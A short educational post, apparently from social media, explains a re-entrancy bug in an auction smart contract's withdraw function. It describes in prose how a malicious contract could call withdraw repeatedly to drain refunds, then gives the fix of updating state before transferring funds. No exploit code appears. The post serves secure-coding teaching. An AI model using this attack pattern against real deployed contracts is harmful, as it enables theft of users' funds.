Would you deploy this Auction contract? 👀
Imagine an auction where people bid. The highest bidder wins. Others get their money back. Here's the process:
- Bidding:
- People send money to bid.
- The highest bid wins.
- Withdraw:
- Outbid people can withdraw their money.
- End Auction:
- The highest bid goes to the auction owner.
The withdraw function has a re-entrancy bug. Here's an example:
- Alice bids 1 ether.
- Bob bids 2 ether.
- Alice withdraws her 1 ether.
- If Alice's withdrawal goes to her smart contract, it could be malicious. It could call
withdrawagain before the first call finishes. - Alice's contract could keep asking for money back before the system realizes she was refunded.
To prevent this, update the state before transferring money. This ensures withdrawals are marked as done before sending money.
- Update the state to mark the withdrawal.
- Transfer the money after updating the state.